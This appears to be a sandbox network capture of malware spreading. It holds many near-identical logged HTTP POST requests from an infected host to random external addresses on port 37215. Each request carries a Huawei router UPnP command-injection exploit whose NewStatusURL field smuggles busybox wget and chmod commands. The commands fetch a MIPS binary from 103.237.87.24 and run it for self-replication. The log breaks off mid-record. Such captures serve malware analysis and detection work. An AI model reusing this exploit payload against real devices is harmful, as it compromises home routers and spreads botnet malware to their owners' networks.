                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2382192.168.2.133431641.125.105.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624805927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2383192.168.2.1352610197.93.179.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624811888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2384192.168.2.134230241.218.12.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624829054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2385192.168.2.1349714157.235.13.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624842882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2386192.168.2.1355192150.163.65.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624849081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2387192.168.2.135452261.145.119.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624850988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2388192.168.2.1345998197.91.122.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624880075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2389192.168.2.1343590157.212.171.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625190020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2390192.168.2.1356758203.163.47.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625190020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2391192.168.2.1350388197.87.218.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625195980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 